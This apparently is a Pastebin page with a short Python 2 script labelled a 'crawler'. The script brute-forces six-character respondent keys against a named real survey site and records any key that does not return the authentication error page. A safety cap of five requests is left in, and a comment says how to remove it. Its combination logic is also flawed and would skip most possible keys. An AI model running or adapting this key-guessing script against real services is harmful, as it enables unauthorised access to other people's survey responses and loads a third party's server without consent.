daily pastebin goal
3%
SHARE
TWEET

Python Crawler for Sites.

rlunde Sep 6th, 2016 (edited) 12 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import urllib2
  2. import itertools
  3.  
  4. sKey = "The respondent authentication key" # This is on all pages that are wrong.
  5. mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk=" # URL to Lodam GPW.
  6. outList = [] # Output list of functioning keys.
  7.  
  8.  
  9. keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" # List of key elements.
  10. subsets = itertools.combinations_with_replacement(keyElements, 6) # Generate list of elements from above.
  11. # WARNING: Generates 120 million combinations to test from, proceed with caution.
  12.  
  13. iterMax = 0 # Test Protection.
  14.  
  15. for i in subsets:
  16.     identifier =  ''.join(i) # Joins the elements of each subset to one string.
  17.  
  18.     iterMax = iterMax + 1 # Comment out below, to remove safety valve.
  19.     if iterMax > 5:
  20.         break
  21.  
  22.     response = urllib2.urlopen(mainURL+identifier) # Call urllib and open webpage.
  23.     html = response.read() # Read response.
  24.  
  25.     if sKey not in html: # Determine if sKey string is in html.
  26.         outList.append(identifier) # If it is not, save the identifier, as it is valid.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top